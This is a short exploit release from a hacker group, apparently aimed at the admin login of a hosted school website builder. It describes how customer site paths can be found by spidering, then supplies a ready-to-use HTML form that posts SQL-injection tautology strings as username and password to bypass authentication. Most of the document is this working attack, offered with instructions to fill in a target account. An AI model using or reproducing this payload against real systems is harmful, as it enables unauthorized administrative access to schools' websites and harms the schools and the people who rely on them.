I MurderSkillz from www.g00ns.net have found a auth bypass vulnerability in Schooltools Site Builder - Educator Edition (Possibly other versions). The vulnerability takes place in admin.asp. I believe what http://schooltools.us does is they host their customers and they all have http://sites.schooltools.us/sites/[ACCOUNT]/admin.asp Of course u can do a website spider to get these other folders/websites cause if you put in http://sites.schooltools.us/sites/ you get access denied.

Vuln found by MurderSkillz - g00ns.net
HTML coded by uid0 - exploitercode.com

Shoutz to all the g00ns and the ppl who fucking hate us =)

<---Start HTML--->

<style type="text/css">
<!--
body {
  background-color: #000000;
}
.style1 {
  font-family: Verdana, Arial, Helvetica, sans-serif;
  color: #FFFF00;
}
.style3 {font-family: Verdana, Arial, Helvetica, sans-serif; color: #FFFF00; font-weight: bold; }
a:link {
  color: #FFFF00;
}
a:visited {
  color: #FFFF00;
}
a:hover {
  color: #FFFF00;
}
a:active {
  color: #FFFF00;
}
-->
</style>
<p><span class="style3"><a href="http://exploitercode.com" target="_blank">www.exploitercode.com</a> - <a href="http://www.g00ns.net" target="_blank">www.g00ns.net</a><br /><br />
Schooltools Site Builder - Educator Edition (Possibly other versions)<br />Orignal exploit by MurderSkillz and uid0</span><br /><br />
  <span class="style1">To have this exploit work, edit the post action under the [ACCOUNT] brackets.</span>

<form name='login' method='post' action='http://sites.schooltools.us/sites/[ACCOUNT]/admin.asp?Action=Login'>
  <input type="hidden" name='UserName' value="' or 'g00ns.net'='g00ns.net">
  <input type="hidden" name='PassWord' value="' or 'g00ns.net'='g00ns.net">
  <input type='submit' name='Submit' value='Login' class='button'>
</p>

<---END HTML--->